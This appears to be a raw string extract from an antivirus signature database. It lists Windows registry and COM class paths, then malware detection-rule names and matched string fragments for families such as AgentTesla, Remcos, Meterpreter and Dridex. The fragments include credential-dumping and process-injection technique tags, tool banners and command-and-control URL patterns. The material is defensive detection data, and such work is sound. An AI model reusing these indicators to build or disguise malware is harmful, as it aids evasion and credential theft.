|5clsid\\{274fae1f-3626-11d1-a3a4-00c04fb950dc}\\version |5clsid\\{334857cc-f934-11d2-ba96-00c04fb6d0d1}\\version |5clsid\\{6bc098a5-0ce6-11d1-baae-00c04fc2e20d}\\version |5clsid\\{b958f73c-9bdd-11d0-852c-00c04fd8d503}\\version |8CLSID\\{00000315-0000-0000-C000-000000000046}\\MiscStatus |8CLSID\\{00000316-0000-0000-C000-000000000046}\\MiscStatus |8CLSID\\{208d2c60-3aea-1069-a2d7-08002b30309d}\\shell\\find |8CLSID\\{25336921-03f9-11cf-8fd0-00aa00686f13}\\MiscStatus |8CLSID\\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}\\MiscStatus *SOFTWARE\\Microsoft\\WAB\\WAB4\\WAB File Name c:\\default.wab 4software\\<<demo by kernel studio>>\\smstest\\settings 8SOFTWARE\\Microsoft\\Internet Explorer\\Toolbar\\WebBrowser (SYSTEM\\ControlSet001\\Services\\Disk\\Enum 0 IDE\\DiskHitachi +system\\currentcontrolset\\services\\asyncmac +system\\currentcontrolset\\services\\flpydisk +system\\currentcontrolset\\services\\scardsvr +system\\currentcontrolset\\services\\schedule 5software\\microsoft\\directdraw\\compatibility\\msgolf98 8SYSTEM\\CurrentControlSet\\Services\\Dhcp\\Linkage\\Disabled 8SYSTEM\\CurrentControlSet\\Services\\tcpip\\serviceprovider 8SYSTEM\\CurrentControlSet\\control\\safeboot\\network\\rpcss 8SYSTEM\\controlset001\\services\\eventlog\\security\\spooler 8SYSTEM\\controlset001\\services\\tcpip\\parameters\\adapters 8system\\controlset001\\control\\nls\\locale\\alternate sorts 8system\\currentcontrolset\\enum\\root\\legacy_tbn178d5\\0000 6SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WbemPerf DAO.Relation.36 TMicrosoft DAO 3.6 Object Library Relation ~'package\\protocol\\stdfileediting\\verb\\0 &&Activate Contents ~-CLSID\\{00000560-0000-0010-8000-00AA006D2EA4} ADODB.Record ~-CLSID\\{549365d0-ec26-11cf-8310-00aa00b505db} ~-clsid\\{6daf9757-2e37-11d2-aec9-00c04fb68820} MOF Compiler ~-clsid\\{92396ad0-68f5-11d0-a57e-00a0c9138c66} RowsetHelper ~1interface\\{00000134-0000-0000-c000-000000000046} IRundown ~1interface\\{00000141-0000-0000-c000-000000000046} IDLLHost ~1interface\\{00000503-0000-0010-8000-00aa006d2ea4} ~1interface\\{00000506-0000-0010-8000-00aa006d2ea4} Fields15 ~1interface\\{0000054d-0000-0010-8000-00aa006d2ea4} Fields20 ~1interface\\{49278a16-7447-11d2-accb-0000f87a37d8} IBindMgr ~1interface\\{6eb22870-8a19-11d0-81b6-00a0c9231c29} ICatalog ~4CLSID\\{0000031A-0000-0000-C000-000000000046}\\ProgID ~4clsid\\{8b20cd60-0f29-11cf-abc4-02608c9e7553}\\progid ~4clsid\\{ecabafc7-7f19-11d2-978e-0000f8757e2a}\\progid queue ~9CLSID\\{00000315-0000-0000-C000-000000000046}\\AuxUserType ~9CLSID\\{148BD520-A2AB-11CE-B11F-00AA00530503}\\DefaultIcon ~9CLSID\\{21EC2020-3AEA-1069-A2DD-08002B30309D}\\DefaultIcon ~9clsid\\{20d04fe0-3aea-1069-a2d8-08002b30309d}\\defaulticon ~9clsid\\{7bd29e00-76c1-11cf-9dd0-00a0c9034933}\\shellfolder ~9clsid\\{88c6c381-2e85-11d0-94de-444553540000}\\shellfolder ~9clsid\\{ff393560-c2a7-11cf-bff4-444553540000}\\shellfolder installdate .system\\currentcontrolset\\control\\crashcontrol autoreboot 0system\\controlset001\\services\\schedule\\security 3software\\microsoft\\directdraw\\compatibility\\savage 9SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RunServices 9SYSTEM\\CurrentControlSet\\Enum\\Root\\ACPI_HAL\\0000\\Control 9SYSTEM\\CurrentControlSet\\Hardware Profiles\\0000\\Software 9SYSTEM\\CurrentControlSet\\services\\eventsystem\\parameters 9software\\Microsoft\\internet explorer\\plugins\\pluginspage 9system\\currentcontrolset\\services\\eventsyvtem\\parameters %system\\currentcontrolset\\control\\lsa fullprivilegeauditing WScript.Shell\\CLSID N{72C24DD5-D70A-438B-8A42-98424B88AFB8} ias.request.1\\clsid N{6BC096B1-0CE6-11D1-BAAE-00C04FC2E20D} propertyvalue\\clsid N{7b9e38b0-a97c-11d0-8534-00c04fd8d503} cdo.ss_smtponarrivalsink\\curver 6CDO.SS_SMTPOnArrivalSink.1 !mime\\database\\charset\\iso-ir-101 iso-8859-2 -CLSID\\{0000032E-0000-0000-C000-000000000046} PipePSFactory -CLSID\\{00020421-0000-0000-C000-000000000046} PSEnumVariant -CLSID\\{00020424-0000-0000-C000-000000000046} PSOAInterface -CLSID\\{545ae700-50bf-11d1-9fe9-00600832db4a} MMCCtrl class -clsid\\{4315d437-5b8c-11d0-bd3b-00a0c911ce86} DeviceMoniker -clsid\\{6eb22881-8a19-11d0-81b6-00a0c9231c29} Catalog Class -clsid\\{bd96c556-65a3-11d0-983a-00c04fc29e36} RDS.DataSpace 1interface\\{0000012a-0000-0000-c000-000000000046} IContinue 1interface\\{0000054e-0000-0010-8000-00aa006d2ea4} Command25 1interface\\{e31fb81b-1335-11d1-8189-0000f87557db} IDXEffect 4CLSID\\{06290BD3-48AA-11D2-8432-006008C3FBFC}\\ProgID script :CLSID\\{0002000F-0000-0000-C000-000000000046}\\InprocServer :CLSID\\{00020424-0000-0000-C000-000000000046}\\InprocServer :CLSID\\{00C429C0-0BA9-11d2-A484-00C04F8EFB69}\\Programmable :CLSID\\{05589FA1-C356-11CE-BF01-00AA0055595A}\\MiscStatus\\1 :CLSID\\{07A774A0-6047-11D1-BA20-006097D2898E}\\Programmable :CLSID\\{0E59F1D5-1FBE-11D0-8FF2-00A0D10038BC}\\Programmable :CLSID\\{10072CEC-8CC1-11D1-986E-00A0C955B42E}\\Programmable :CLSID\\{16B280C5-EE70-11D1-9066-00C04FD9189D}\\Programmable :CLSID\\{2206CDB2-19C1-11D1-89E0-00C04FD7A829}\\Programmable :clsid\\{4f664f91-ff01-11d0-8aed-00c04fd7b597}\\programmable :clsid\\{65303443-ad66-11d1-9d65-00c04fc30df6}\\programmable :clsid\\{6bc096c6-0ce6-11d1-baae-00c04fc2e20d}\\programmable :clsid\\{7e8bc44e-aeff-11d1-89c2-00c04fb6bfc4}\\programmable :clsid\\{ae24fdae-03c6-11d1-8b76-0080c744f389}\\programmable system\\controlset001\\control waittokillservicetimeout 20000 %SOFTWARE\\Microsoft\\Internet Explorer 8.0.6001.18702 -system\\currentcontrolset\\services\\rpclocator 1system\\currentcontrolset\\services\\msdtc\\security 2system\\controlset001\\services\\dhcp\\configurations 3software\\Microsoft\\internet explorer\\image caching 4system\\currentcontrolset\\services\\pptpminiport\\enum 9db3402aee94 9db3b56fb88e 35b36d4aea70 35b36d4aea70IncludesTechniqueTracker schtask-target 8db3ebfa04fd 41b3f2dbc5c1 normal.dotm a7d73a99601c a7d73a99601cIncludesResearchData T1071.001 lolbin_web_github 8eb3e153f672 [^ ]+[\"]?(.*%.xll[\"]?) %appdata%\\microsoft\\addins\\\\ 8db3e6837969 105b3d20332b8 10a910bd3b1e verb_ HTTP_GET \tHTTP_GET HTTP_POST Telemetry_REFERER 91b3e78338e5 cbb3436173df BMLua:StartupFolderPathChange.EE !BMLua:StartupFolderPathChange.EE 7db308b48afd OEF@ 7db3428a1528 OEF@ 83b3ff0d7d87 343d70572bd3e 343d70572bd3eIncludesResearchData NewWrittenBySystemProcessDetected \"NewWrittenBySystemProcessDetected remoteservice_created_c 164b35dbfda7c 164b35dbfda7cIncludesResearchData T1055.012 herpaderping_parent_a 69b3ec312bd9 (%..?.?.?.?)%.lnk .docx|.docm|.xlsx|.xlsm|.csv|.pptx|.pps|.pptm|.db|.dat|.idx|.gif|.jpg F.docx|.docm|.xlsx|.xlsm|.csv|.pptx|.pps|.pptm|.db|.dat|.idx|.gif|.jpg \\reci?ente?\\ \\microsoft outlook.lnk 7dd727cee6ad 7dd727cee6adIncludesResearchData msaccess.exe interprocess_com 41b38a38b33d 41b38a38b33dIncludesTechniqueTracker remoteservice-target 227b33ebf54c1 gvfs.mount.exe sqlservr.exe rdpinit.exe 15b39e6d4e13 15b39e6d4e13IncludesResearchData T1003.002 credentialdumping 5fb3b9f4193b 5fb3b9f4193bIncludesBMLuaLib \tpassword 41b30cdcaf0e DEF@ sdelete.exe 55b30e415a66 DEF@ 55b3ad076163 DEF@ 77b30caf9443 this_sigatt -11d0-A1CA-00AA00C16E65}\\ShellEx FSOFTWARE\\Classes\\CLSID\\{0E59F1D5-1FBE-11D0-8FF2-00A0D10038BC}\\Control FSOFTWARE\\Classes\\CLSID\\{289228DE-A31E-11D1-A19C-0000F875B132}\\Control FSOFTWARE\\Classes\\clsid\\{0003000d-0000-0000-c000-000000000046}\\treatas FSOFTWARE\\Classes\\clsid\\{fd8d3a5f-6066-11d1-8c13-00c04fd8d503}\\version FSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders FSYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols FSYSTEM\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations Fsoftware\\Classes\\typelib\\{97d25db0-0363-11cf-abc4-02608c9e7553}\\1.0\\0 Fsoftware\\Microsoft\\internet explorer\\advancedoptions\\multimedia\\picts Fsoftware\\classes\\typelib\\{333c7bc1-460f-11d0-bc04-0080c7055a83}\\1.0\\0 Fsoftware\\classes\\typelib\\{7988b57c-ec89-11cf-9c00-00aa00a14f56}\\1.0\\0 Fsoftware\\classes\\typelib\\{7999fc20-d3c6-11cf-acab-00a024a55aef}\\1.0\\0 Fsoftware\\classes\\typelib\\{a1b9e03c-3226-11d2-883e-00104b2afb46}\\1.0\\0 Fsoftware\\classes\\typelib\\{bacedf3e-74ab-11d0-b162-00aa00ba3258}\\1.0\\0 !Scripting.FileSystemObject\\CLSID N{0D43FE01-F093-11CF-8940-00A0C9054228} !WinHttp.WinHttpRequest.5.1\\CLSID N{2087c2f4-2cef-4953-a8ab-66779b670495} !cdo.ss_smtponarrivalsink.1\\clsid N{CD000005-8B95-11D1-82DB-00C04FB1625D} !comadmin.comadmincatalog.1\\clsid N{F618C514-DFB8-11D1-A2CF-00805FC79235} 1interface\\{00020020-0000-0000-c000-000000000046} .AVIFile Interface 1.22 1interface\\{3050f50a-98b5-11cf-bb82-00aa00bdce0b} .DispHTMLCommentElement 1interface\\{3050f527-98b5-11cf-bb82-00aa00bdce0b} .DispHTMLMarqueeElement 1interface\\{3050f563-98b5-11cf-bb82-00aa00bdce0b} .DispHTMLGenericElement 3typelib\\{44ec0535-400f-11d0-9dcd-00a0c90391d3}\\1.0 *ATL 2.0 Type Library 4CLSID\\{10072CEC-8CC1-11D1-986E-00A0C955B42E}\\ProgID (PeerDraw.PeerDraw.1 4CLSID\\{2206CDB3-19C1-11D1-89E0-00C04FD7A829}\\ProgID (MSDASCErrorLookup.1 4clsid\\{13709620-c279-11ce-a49e-444553540000}\\progid (Shell.Application.1 4clsid\\{182c40f0-32e4-11d0-818b-00a0c9231c29}\\progid (COM+ Catalog Server 4clsid\\{4662daaa-d393-11d0-9a56-00c04fb68bf7}\\progid (ITIR.LocalCatalog.4 4clsid\\{adb880a4-d8ff-11cf-9377-00aa003b7a11}\\progid (HHCtrl.FileFinder.1 4clsid\\{c3701884-b39b-11d1-9d68-00c04fc30df6}\\progid (OlePrn.OleInstall.1 4clsid\\{ef636391-f343-11d0-9477-00c04fd36226}\\progid (DBRSTPRX.AsServer.1 5clsid\\{b75ac000-9bdd-11d0-852c-00c04fd8d503}\\\\progid &AccessControlEntry <CLSID\\{00000514-0000-0010-8000-00aa006d2ea4}\\InprocServer32 <CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocServer32 <CLSID\\{8856F961-340A-11D0-A96B-00C04FD705A2}\\InprocServer32 shdocvw.dll <CLSID\\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}\\InprocServer32 wscntfy.dll <clsid\\{00021401-0000-0000-c000-000000000046}\\inprocserver32 <clsid\\{217fc9c0-3aea-1069-a2db-08002b30309d}\\inprocserver32 <clsid\\{42071713-76d4-11d1-8b24-00a0c9068ff3}\\inprocserver32 deskmon.dll <clsid\\{473aa80b-4577-11d1-81a8-0000f87557db}\\InprocServer32 Dxtrans.dll <clsid\\{c40fbd00-88b9-11d2-84ad-00c04fa31a86}\\inprocserver32 dsquery.dll >clsid\\{73FDDC80-AEA9-101A-98A7-00AA00374959}\\\\InprocHandler32 ECLSID\\{00000319-0000-0000-C000-000000000046}\\DataFormats\\DefaultFile G*\\shellex\\PropertySheetHandlers\\{1f2e5c40-9550-11ce-99d2-00aa006e086c} G*\\shellex\\PropertySheetHandlers\\{3EA48300-8CF6-101B-84FB-666CCB9BCD32} control panel\\desktop wallpaperRC:\\Documents and Settings\\Alan Tracey\\Lo +SOFTWARE\\Microsoft\\Internet AccountManager Default Mail Account 00000001 ;software\\local appwizard-generated applications\\1\\settings ;software\\local appwizard-generated applications\\e\\settings ;software\\local appwizard-generated applications\\y\\settings $software\\classes\\folder\\defaulticon H%SystemRoot%\\System32\\shell32.dll,3 !0d54bc52ab24b5221a6cb4e83b15d859 *SOFTWARE\\Microsoft\\Internet Explorer\\Main Start Page(http://www.bing.com /software\\classes\\cdo.nntpearlyconnector\\curver 2CDO.NNTPEarlyConnector.1 /software\\classes\\cdo.nntpfinalconnector\\curver 2CDO.NNTPFinalConnector.1 5SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost netsvcs AeLookupSvc ;SOFTWARE\\Microsoft\\DirectDraw\\Compatibility\\ThirdDimension t3rd.EXE <system\\currentcontrolset\\control\\keyboard layout\\doskeybids \t00010410 FSOFTWARE\\Classes\\CLSID\\{00020000-0000-0000-C000-000000000046}\\AVIFile GSYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\\AllowedPaths GSoftware\\Microsoft\\internet explorer\\advancedoptions\\browse\\autoappend Gsoftware\\Microsoft\\internet explorer\\advancedoptions\\multimedia\\animat Gsoftware\\Microsoft\\internet explorer\\advancedoptions\\multimedia\\sounds protocols\\handler\\javascript clsidN{3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} -clsid\\{7007acc1-3202-11d1-aad2-00805fc1270e} 8Dial-up Connection UI Class -clsid\\{ecabafb7-7f19-11d2-978e-0000f8757e2a} 8Contruction Activator Class -clsid\\{ecabb0aa-7f19-11d2-978e-0000f8757e2a} 8Byot Server Extended Object 1interface\\{1ff6aa72-5842-11cf-a707-00aa00c0098d} 0HTMLTextContainerEvents 1interface\\{3050f3c4-98b5-11cf-bb82-00aa00bdce0b} 0HTMLObjectElementEvents 4CLSID\\{06290BDA-48AA-11D2-8432-006008C3FBFC}\\ProgID *scriptlethandler.asp 4CLSID\\{2933bf90-7b36-11d2-b20e-00c04f983e60}\\ProgID *Microsoft.XMLDOM.1.0 4clsid\\{06290bd4-48aa-11d2-8432-006008c3fbfc}\\progid *Scriptlet.HostEncode <CLSID\\{00020424-0000-0000-C000-000000000046}\\InprocServer32 <CLSID\\{00020425-0000-0000-C000-000000000046}\\InprocServer32 <CLSID\\{0006F03A-0000-0000-C000-000000000046}\\InprocServer32 <CLSID\\{00BB2764-6A77-11D0-A535-00C04FD7D062}\\InprocServer32 browseui.dll <CLSID\\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\\InprocServer32 vbscript.dll <clsid\\{46763ee0-cab2-11ce-8c20-00aa0051e5d4}\\inprocserver32 <clsid\\{4de7016c-5ef9-11d1-8c13-00c04fd8d503}\\inprocserver32 <clsid\\{59099400-57ff-11ce-bd94-0020af85b590}\\inprocserver32 diskcopy.dll <clsid\\{72d3edc2-a4c4-11d0-8533-00c04fd8d503}\\inprocserver32 <clsid\\{7988b571-ec89-11cf-9c00-00aa00a14f56}\\inprocserver32 <clsid\\{7b9e38b0-a97c-11d0-8534-00c04fd8d503}\\inprocserver32 <clsid\\{7e99c0a3-f935-11d2-ba96-00c04fb6d0d1}\\inprocserver32 <clsid\\{94a909a5-6f52-11d1-8c18-00c04fd8d503}\\inprocserver32 <clsid\\{b196b286-bab4-101a-b69c-00aa00341d07}\\inprocserver32 <clsid\\{b75ac000-9bdd-11d0-852c-00c04fd8d503}\\inprocserver32 =CLSID\\{00C429C0-0BA9-11d2-A484-00C04F8EFB69}\\ToolBoxBitmap32 dxtmsft.dll HCLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\PersistentAddinsRegistered Hclsid\\{5645c8c1-e277-11cf-8fda-00aa00a14f93}\\persistentaddinsregistered Hclsid\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\persistentaddinsregistered <software\\local appwizard-generated applicat?ons\\s0\\settings <software\\local appwizard-generated applications\\k2\\settings <software\\local appwizard-generated applications\\s0\\settings Search Page(http://www.bing.com A10SIM.EXE ;system\\currentcontrolset\\control\\keyboard layouts\\00010409 layout id 0002 ;system\\currentcontrolset\\control\\keyboard layouts\\0001040a 0086 ;system\\currentcontrolset\\control\\keyboard layouts\\00011809 0026 ;system\\currentcontrolset\\control\\keyboard layouts\\00020409 0001 ;system\\currentcontrolset\\control\\keyboard layouts\\00030409 001A >system\\currentcontrolset\\control\\keyboard layout\\doskeybcodes \t00000c0c ?system\\currentcontrolset\\services\\lanmanserver\\shares\\security \ttran e6780de18c91 e9787eb364f2 HSTR:Dradkiter.A1 ea78e638b732 ef787b014695 f58dc305f072 PUA:Block:VSearch.E fb78c870ea56 fc788ce1a097 fc8d03d076e2 PUA:Block:Conduit.F fd78ae2c6e93 1c3785b3257dd HSTR:Strakupa.A1 27d78dd17aa12 !#ALF:Trojan:Script/Godex.B!dha SCPT:GodexB 1789d0a35404 4a8d5a17cb3c PUA:Block:DirectHW.A 4e8da4de03b2 PUA:Block:Synataeb.A 4f8da146667f PUA:Block:Bundlore.B 59789a919cd8 5a8d43306a26 PUA:Block:Bundlore.K 5cea042db634 PUA:Block:Bundlore.A 648d65f9e3a2 PUA:Block:Maconomi.A 6878bcde4348 6a8d816434d7 PUA:Block:DirectHW.B 6f8dead12228 PUA:Block:SkypeCap.C 748d37375a4b PUA:Block:Ethereum.S 7a786b26b6e1 7a78bf518b08 7d8dd30aef2b PUA:Block:MacBooster 7f8d6aa7a3fd PUA:Block:Bundlore.L 807810aeed62 8478b1d3afe7 898dc7b8f69b PUA:Block:Bundlore.F 8b8d9b0e7745 PUA:Block:Bundlore.T 908d3de13731 PUA:Block:SkypeCap.B 928de8081ce1 PUA:Block:Bundlore.S 9a8df3f2af9f PUA:Block:SkypeCap.A a68dd36bc0e1 PUA:Block:Bundlore.C a78df606c680 PUA:Block:Bundlore.X a861db542652 ba783b90afbe bb78748cf1d4 HSTR:Nivdort.EXP05 de786c005836 9c7809ec5328 9c7809ec5328Flags1 10278bd614510 107781fabf1cf 10778ee004595 10a78cf5fce00 10e78ce0aaa15 112788b03ec91 1178dab632c86 PUA:Block:Genieo.A2 11878e85484f0 1197895e40438 !#ALF:Phish:PHP/PhishKitBlock.B!MTB !#TEL:Exploit:O97M/CVE-2017-11882.CPIZ!MTB !#AGGR:LowerInternetSecurity !#ALF:TrojanDownloader:Java/Banload !#lowfi:AVDirBanker !#SLF:MamacseMacro.A !#ALF:WmiCreatorStep.A1 !#TEL:XLSMSuspDllRegister !#ALF:Phish:PHP/MsEmails.GG!MTB !#ALF:HackTool:PowerShell/AMQP.A!MTB !#AGG:AllowList:Win32/Corecast_Apps.Etic.A !#AGGR:Exploit:JS/Pangimop !#ALF:Trojan:Win32/Cassini_c50c68af!ibt !#ALF:Trojan:Java/Adwind.PJA!MTB !#ALF:Phish:PHP/MS_Sharepoint_PKT!MTB !#TEL:TrojanDownloader:O97M/EncDoc.ENCR!MTB !#ALF:HackTool:PowerShell/ADUtils.A!MTB !#ALF:Trojan:Win32/Cassini_58c48878!ibt !#AGG:AllowList:Win32/UMEZAWA.UtVideoCodec.A !#TrojanDropper:Win32/EFIPayload !#AGGR:Exploit:JS/FunkMaster.A!dha !#SLF:HackTool:PowerShell/Internaloff.Q1!MTB !#SLF:HackTool:PowerShell/Internaloff.R1!MTB !#AGGR:SuspPoshKeylogger!amsi !#AGG:AllowList:Win32/Attache.A !#AGG:AllowList:Win32/Elevenapp.A !#Lua:Macro:O97M/Macrothread.A!amsi !#ALF:TrojanDownloader:JS/Nemucod.S00d !#SLF:Context/OfficeAttachLnkFileWithPowershellADS.A !#AGGR:Exploit:SWF/Netis.E !#AGG:AllowList:Win32/TopalaSoftware.A !#ALF:Trojan:Win32/Cassini_de03f6e8!ibt !#AGGR:Exploit:JS/Phisims!lowfi !#AGG:AllowList:Win32/T_C_Brogden_Ltd.A !#ALF:Phish:PHP/Blocklist_IPcheck.GG!MTB !#SLF:PowerShell/DiscoveryGetProcessList.A !#TEL:TrojanDownloader:O97M/TrickBot.DR!MTB !#MpInternal_Tencode !#SLF:VBS/GootKit.J!ibt !#ALF:Ransom:Java/Tycoon.PA!MTB !#ALF:Ransom:BAT/PonyFinal.SD!MTB !#ALF:Trojan/PSDynamicAssembly.B2 !#ALFPER:VirTool:O97M/RTFDDEDownloader !#ALF:TrojanDownloader:O97M/EncDoc.STD!MTB !#ALF:TrojanDownloader:O97M/EncDoc.STE!MTB !#TEL:Trojan:Win32/Tnega.ZGGA!MTB !#ALF:Trojan:O97M/CVE-2017-11882.CS!eml !#TEL:TrojanDownloader:O97M/EncDoc.QAB!MTB !#SLF:AGGR:CopyRenamed!autoruns.exe !#TEL:TrojanDownloader:O97M/EncDoc.XRS!MTB !#AGG:AllowList:Win32/hotelEasy.A !#ALF:Trojan:AndroidOS/Fakeinst.S !#SLF:Context/DocAttachBatFileWithCsc.A !#SLF:Context/DocAttachCmdFileWithCsc.A !#SLF:Context/DocAttachLnkFileWithCsc.A !#SLF:Context/DocAttachPifFileWithCsc.A !#AGG:AllowList:Win32/Informix.sqliprt.A }%7c%7c[A-F0-9]{40} Steam.exe Programm steamcommunity.com/tradeoffer/new/ steamcommunity.com/tradeoffer/new/x !#HSTR:TrojanSpy:Win32/Xtrat!id ImSecure ImSecureBINDER ImSecure RAT x.htmlx !#SLF:Trojan:Win32/Gippers.C!dha %s/image_download.php?uid=%.5d /search?hl=en&q=%s&meta=%s srv3dll.dll srv3dll.dllInstall %s\\fp3n.~tp %s\\fp3n.~tpx !#ALF:HSTR:MITM:UtilAds <Ionic.Zip.ZipEntry>.ge set_HostsThatBypass get_PACScriptLocation set_HttpsProxy SetWinInetProxy SetWinInetProxyx !#ALFPER:HSTR:BrowserModifier:Win32/Kipidow.A KpPopupDlg.exe //khit.cn/soft/ kp1configuration.ini kplnk1 SetShortCutArgs SetShortCutArgsx !#BM_AT_cry:AdvancedMassSender www.massender.com Advanced Mass Sender Nexus 6 *MassSender.exe _MassSenderMainForm _MassSenderMainFormx !#ALF:Trojan:MSIL/AgentTesla.CNK!MTB !#HSTR:HackTool:MSIL/Skiwin set_spamhistory WinSkype.exe WinSkype.MassMessageScreen.resources Private Skype Tool By Royal Private Skype Tool By Royalx !#TELPER:HSTR:Bundler:Win32/Vittalia media.vit tkDecript.pdb OFFERURL OFFERBASENAME OFFERURLOFFERBASENAME =OfferInstallCompleted& =OfferInstallCompleted&x !#HSTR:TrojanSpy:Win32/Wekrober.A !#ALF:HackTool:Win32/Gazling.A!dha Usage: %s TargetIP TargetPort Recive Data num:%d target port :%5d WSAStartup() failed:%d WSAStartup() failed:%dx !#HSTR:Skymonk \\bundler\\Production\\bundler.pdb AVOffer@@ AVScript@@ AVDataBank@@ AVCryptedZipFormat@@ AVHttpGetFile@@ AVHttpGetFile@@x !#HSTR:Trojan:MSIL/AgentTesla.OXFV!MTB < HebrewNumberParsing.CustAttr HebrewNumberParsing.CustAttrx !#HSTR:Trojan:MSIL/AgentTesla.OXGU!MTB N EntryPointx !#HSTR:Trojan:MSIL/AgentTesla.OXDC!MTB 2 Bitmapx !#HSTR:Trojan:MSIL/AgentTesla.OXDX!MTB 5 !#HSTR:Trojan:MSIL/AgentTesla.VI558!MTB / \tBlockCopy get_XXIV get_XXIVx !#HSTR:Trojan:MSIL/AgentTesla.MXR!MTB 6 dqwdqwdwqdqwqwdf dqwdqwdwqdqwqwdfx !#ALF:Trojan:MSIL/AgentTesla.JHE!MTB ) !#ALF:Trojan:MSIL/Kryptik.TO!MTB ) ParameterizedThreadStart ParameterizedThreadStartx !#TEL:Trojan:MSIL/AgentTesla.OLU!MTB 1 GetExportedTypes !#ExclusionStimilini U net core\\WaxpeerApp \\WaxpeerApp\\obj\\Release\\netcoreapp \\win-x \\WaxpeerApp.pdb waxpeer.comx !#HSTR:Exploit:MSIL/CVE-2013-0074.F HtmlObject System.Windows.Browser System.Windows.Browserx !#ALF:HSTR:PUA:Win32/AppUpCleaner AppUPCLEANER \\pz_git\\bin\\publish\\setupInst.pdb !\\pz_git\\bin\\publish\\setupInst.pdb %s\" /VERYSILENT /SP- hideWindowDesktop !#ALF:Trojan:MSIL/Formbook.SIBA!MTB !#ALF:Trojan:Win32/Ltam.BP 306DDHAGH738294728973892KKDLS7823978492GAHJGD767GUEYHx !#Lowfi:HSTR:Win32/Obfuscator.VBInject *\\AC:\\Users\\Administrator\\Desktop\\VB2\\osama.vbpx !#ALF:HSTR:MITM:RocketTab:Installer {25abbe1f-a79f-4391-9971-d1c5b44b582e} gb-installer-core gb-installer-corex !#HSTR:VirTool:MSIL/GeneralPacker.F H4sIAAAAAAAEAO29B2AcSZYlJi9tynt H4sIAAAAAAAEAO29B2AcSZYlJi9tyntx !#HSTR:Lecpetex.A2 tBjh, !#ALFPER:HSTR:ElexYacSafeDeskCommand.A click.idesk.normal. click.idesk.link. func.idesk.system. screenview.idesk.normal. screenview.idesk.normal.x !#HSTR:MSIL/PvLogiciels.dotNetProtector.A PvLogiciels.dotNetProtector.Runtime <dotNetProtector> <dotNetProtector>x !#HSTR:Virtool:MSIL/Packer.Rugland2 SmartAssembly.SmartExceptionsCore.Resources.current.png RPX 1.3.4399.43191x !#TEL:Trojan:MSIL/Bladabindi.DG!MTB !#TEL:Trojan:MSIL/Remcos.PR!MTB !#Exploit:Win32/Crosspoint.ASLR!Lowfi !#HSTR:Backdoor:Win32/Sedall.A!dha HTTP/1.0 200 <id>HTTP/1.0 200rem Connecting to the server... ArgumentsWINIDx !#HSTR:TD_Wosamereen.A !#HSTR:Trojan:Win32/Qhosts.AY :45612/stat/tuk/ HTTP/1.1 ru-RU,ru;q=0.9,en;q=0.8 :45612/stat/tuk/ GET /stat/tuk/ HTTP/1.1 GET /stat/tuk/ HTTP/1.1x !#ALF:PUA:Win32/LoadMoney!bit !#HSTR:PhanEvade.x64!Heap !#TEL:Ransom:MSIL/Shinolocker.AA!MTB Encrypt DecryptEncryptConvert set_BlockSize set_BlockSizeset_KeySizeset_PaddingFromBase64Stringx !#PUA:ML:Blocked:Itva iTVASoft installer node0.installtraffic.com http://legal.yandex.ru/ Installer for InstallTraffic.com Installer for InstallTraffic.comx !#TEL:Trojan:Win32/FileCoder.BK!MTB jjjjjj 0kNPi5DZt?lDTyB~nKSxSBSkeRuZcclMc8 VENESUELLA VENESUELLAx !#ALFPER:HSTR:Win32/InstallerTech.D /TID=installer-tech /PROFILE=installer-tech /CHANNEL=installer-tech InstTech aller !#PUA:Block:SearchAwesome FreeVPN.win Software\\FreeVPN Make your web searches awesome with Search Awesome 2Make your web searches awesome with Search Awesome searchawesome.net searchawesome.netx !#ALF:Trojan:Win64/Hathler.E!dha FakeHandle KernelShellCode NtGDIOpenDCBytes GdiPrinterThunk C:\\windows\\system32\\test.txt C:\\windows\\system32\\test.txtx !#HSTR:DridexPreloader.B fernel5.dll InECanaryyitChrome barbeta @byroughly DxCcontrols werearecame werearecamex !#HSTR:Win32/Meterpreter!ws2_32_APIs !#HSTR:XingCloudDownloader xingcloud.com WsysSvc !#HSTR:Backdoor:Flooding.Samples synflood httpflood udpflood icmpflood !#HSTR:VirTool:Win32/Injector.FQ \tpsapi.dll EnumPageFilesA Kropbox, Knc Zitoin Rroject Smith Borporation Citrus.exe Citrus.exex !#ALF:Trojan:MSIL/AgentTesla.JCO!MTB ` !#HSTR:Trojan:MSIL/AgentTesla.OXEX!MTB H ShutDown.frmclass ShutDown.frmclassx !#ALF:Trojan:MSIL/AgentTesla.EV!MTB > ToStringx !#HSTR:Trojan:MSIL/AgentTesla.OXEN!MTB 1 Reversex !#HSTR:TrojanDownloader:Win32/Small.AB !#AllowList:AutoCAD 2 \\develop\\global\\Release \\bin\\acad\\acadlock.pdb ain/develop/global/rc/Core/acadicon.rc &ain/develop/global/rc/Core/acadicon.rc @AutoCAD@Autodesk @AutoCAD@Autodeskx !#HSTR:TrojanDownloader:Win32/Losabel.G pagefile.exe autoruns.exe shadowservice.exe shadowservice.exex !#ALF:Trojan:MSIL/Ursu.A!MTB Giantmaster Thousandinto Jobdifference GrewAsk Seeingsheet Seeingsheetx !#Lowfi:HSTR:Win32/TightRope C:\\Programming\\GitHome\\master\\Employers\\Franco\\TightRope-BundleManager\\Custom\\UacInfo\\Release\\UACInfo.pdb C:\\Programming\\GitHome\\master\\Employers\\Franco\\TightRope-BundleManager\\Custom\\UacInfo\\Release\\UACInfo.pdbx !#Lowfi:HSTR:Win32/WidgiToolbar.C coupons_event_5D824970-61D6-4eee-860A-600A48AB5955x !#SLF:HSTR:Win32/Dozlodz.A!MTB !#ALF:Backdoor:Win32/Tnega.MD!MTB !#ALF:HSTR:Trojan:Win32/AGObfuscator.C !#ALFPER:Trojan:Win32/WellMess.X!dha C:/Server/BotUI/App_Data/Temp/ /src/ 